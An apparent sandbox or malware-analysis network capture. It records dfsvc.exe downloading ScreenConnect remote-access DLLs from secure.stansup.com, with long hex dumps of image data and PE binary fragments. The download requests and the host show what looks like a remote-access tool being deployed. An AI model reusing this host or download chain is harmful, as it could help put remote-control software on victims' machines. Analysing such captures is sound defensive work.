                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff ff
                                                                                                                                                                                                                                                        Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC16384INData Raw: d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: ffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
                                                                                                                                                                                                                                                        2024-10-25 17:27:38 UTC16375INData Raw: 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: n


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        8192.168.2.114984479.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:39 UTC95OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 197120
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:39 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1e 35 ea eb 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 5d ca 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5" 0 `]@
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC16384INData Raw: 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06
                                                                                                                                                                                                                                                        Data Ascii: &rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***0@su
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC16384INData Raw: 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc 06
                                                                                                                                                                                                                                                        Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC16384INData Raw: 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f 06
                                                                                                                                                                                                                                                        Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
                                                                                                                                                                                                                                                        2024-10-25 17:27:40 UTC16384INData Raw: 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: *+{>+Bd+/q+PX!*++j,f f,f f: ,t',x)*f2vV
                                                                                                                                                                                                                                                        2024-10-25 17:27:41 UTC16384INData Raw: 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 6b
                                                                                                                                                                                                                                                        Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkkk
                                                                                                                                                                                                                                                        2024-10-25 17:27:41 UTC16384INData Raw: 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 61
                                                                                                                                                                                                                                                        Data Ascii: equestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadata
                                                                                                                                                                                                                                                        2024-10-25 17:27:41 UTC16384INData Raw: 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 65
                                                                                                                                                                                                                                                        Data Ascii: Monitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceive
                                                                                                                                                                                                                                                        2024-10-25 17:27:41 UTC16384INData Raw: 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 75
                                                                                                                                                                                                                                                        Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVolu
                                                                                                                                                                                                                                                        2024-10-25 17:27:41 UTC16384INData Raw: 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 06 01 00 e4 00 00 00 06 01 00 48 00 00 00 06 01 00 49 00 00 00 06 01
                                                                                                                                                                                                                                                        Data Ascii: tMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMultipleTInheritedHI


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        9192.168.2.114985979.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC120OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 1721856
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:42 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f8 ae 85 b3 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 92 5c 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 a5 6f 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL" 0>\ ` o@
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16384INData Raw: 00 0a 99 00 0c 00 00 00 00 02 00 81 00 24 a5 00 0c 00 00 00 00 02 00 73 00 7d f0 00 07 00 00 00 00 02 00 06 00 f1 f7 00 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 de 00 00 06 72 71 06 00 70 28 01 02 00 0a 0a 02 06 28 bb 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 bc 00 00 06 18 8d d6 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 02 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 03 02 00 0a 73 04 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0b 01 00 06 1f 0a 16 20 7c 4f 00 00 73 06 02 00 0a 28 6e 01 00 0a 2c 35 20 05 01 00 00 73 07 02 00 0a 0a 06 6f 08 02 00 0a 06 28 ea 01 00 06 0b 07 16 30 0b 28 c0 01 00 0a 28 c7 00 00 06 7a 06 16 07 6f 09 02
                                                                                                                                                                                                                                                        Data Ascii: $s}0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5 so(0((zo
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16384INData Raw: fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c cb 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4b 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 51 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f 1f 5f 62 8d d8 00 00 01 7d 00 01 00 04 02 7b 00 01 00 04 8e 69 d0 d8 00 00 01 28 51 00 00 0a 28 0f 02 00 0a 5a 0c 02 7b 00 01 00 04 08
                                                                                                                                                                                                                                                        Data Ascii: (-*{*s{z2{*0<{3{(NoO3}+sK{}*(Q*z(,}(NoO}**0{,;*}%X_b}{i(Q(Z{
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16384INData Raw: 00 37 cc 76 22 06 00 7e 54 76 22 06 00 81 90 76 22 06 00 66 a3 76 22 06 00 43 aa 76 22 06 00 ad cf 79 22 06 00 bc 45 79 22 06 00 54 46 76 22 06 00 ce 58 76 22 06 00 6c bf 76 22 06 00 f8 69 76 22 06 00 56 9f 76 22 06 00 af 60 76 22 06 00 fe ce 76 22 06 00 bb 5f 76 22 06 00 d3 51 2d 25 06 00 99 be 76 22 06 00 11 be 76 22 06 10 24 51 ff 25 06 06 80 30 af 08 56 80 36 c8 03 26 56 80 1f c8 03 26 06 06 80 30 af 08 56 80 fc 9c 08 26 06 06 80 30 af 08 56 80 62 27 0d 26 56 80 90 29 0d 26 56 80 b9 0d 0d 26 56 80 86 29 0d 26 06 06 80 30 76 22 56 80 2c 39 12 26 56 80 4d c8 12 26 56 80 5f 39 12 26 56 80 16 bd 12 26 56 80 d2 9b 12 26 56 80 e8 c0 12 26 56 80 72 7f 12 26 56 80 12 c8 12 26 56 80 ae 9b 12 26 56 80 71 88 12 26 56 80 c1 6c 12 26 56 80 b0 6c 12 26 56 80 88 6b
                                                                                                                                                                                                                                                        Data Ascii: 7v"~Tv"v"fv"Cv"y"Ey"TFv"Xv"lv"iv"Vv"`v"v"_v"Q-%v"v"$Q%0V6&V&0V&0Vb'&V)&V&V)&0v"V,9&VM&V_9&V&V&V&Vr&V&V&Vq&Vl&Vl&Vk
                                                                                                                                                                                                                                                        2024-10-25 17:27:42 UTC16384INData Raw: a5 00 00 00 00 83 00 c1 07 09 3b 0d 07 71 a5 00 00 00 00 91 18 df 98 16 27 0e 07 7d a5 00 00 00 00 86 18 b4 98 01 00 0e 07 85 a5 00 00 00 00 83 00 8e 02 27 3b 0e 07 8d a5 00 00 00 00 83 00 14 0a 27 3b 0f 07 95 a5 00 00 00 00 86 18 b4 98 05 00 10 07 b4 a5 00 00 00 00 e1 01 73 58 01 00 11 07 ec a5 00 00 00 00 e1 01 ed c1 3d 00 11 07 b8 a7 00 00 00 00 81 00 ab 0d 01 00 11 07 d4 a7 00 00 00 00 e1 09 86 bb e8 18 11 07 dc a7 00 00 00 00 e1 01 c9 b5 01 00 11 07 e3 a7 00 00 00 00 e1 09 4c bc 4e 00 11 07 ec a7 00 00 00 00 e1 01 84 97 2e 3b 11 07 40 a8 00 00 00 00 e1 01 50 98 64 00 11 07 00 00 01 00 80 6b 00 00 01 00 68 a5 00 00 01 00 80 6b 00 00 01 00 bd 5e 00 00 01 00 68 a5 00 00 01 00 bd 5e 00 00 01 00 ba 74 00 00 01 00 02 a7 00 00 01 00 ba 74 00 00 01 00 8c ca
                                                                                                                                                                                                                                                        Data Ascii: ;q'}';';sX=LN.;@Pdkhk^h^tt
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 4c 7c 04 39 02 fc 6f 89 01 99 02 a9 6a 7c 04 99 02 ef 58 43 1b 99 07 e2 6a 3d 0b 4c 04 6f 98 5b 00 54 04 6b bc 49 00 44 02 81 0d d9 00 08 00 14 00 2d 1c 08 00 18 00 32 1c 08 00 1c 00 37 1c 08 00 20 00 3c 1c 08 00 b8 00 41 1c 0e 00 bc 00 46 1c 0e 00 c0 00 59 1c 0e 00 c4 00 6a 1c 08 00 c8 00 7d 1c 08 00 cc 00 82 1c 0e 00 d0 00 87 1c 0e 00 d4 00 96 1c 0e 00 d8 00 a5 1c 0e 00 e0 00 ce 1c 08 00 f0 00 6c 1d 08 00 f4 00 71 1d 08 00 f8 00 76 1d 08 00 1c 01 2d 1c 08 00 20 01 32 1c 08 00 24 01 37 1c 09 00 28 01 32 1c 09 00 2c 01 37 1c 09 00 30 01 7b 1d 09 00 34 01 80 1d 09 00 38 01 32 1c 09 00 3c 01 37 1c 09 00 40 01 32 1c 09 00 44 01 37 1c 09 00 48 01 7b 1d 09 00 4c 01 80 1d 09 00 50 01 85 1d 09 00 54 01 8a 1d 09 00 58 01 8f 1d 09 00 5c 01 94 1d 09 00 60 01 99 1d
                                                                                                                                                                                                                                                        Data Ascii: L|9oj|XCj=Lo[TkID-27 <AFYj}lqv- 2$7(2,70{482<7@2D7H{LPTX\`
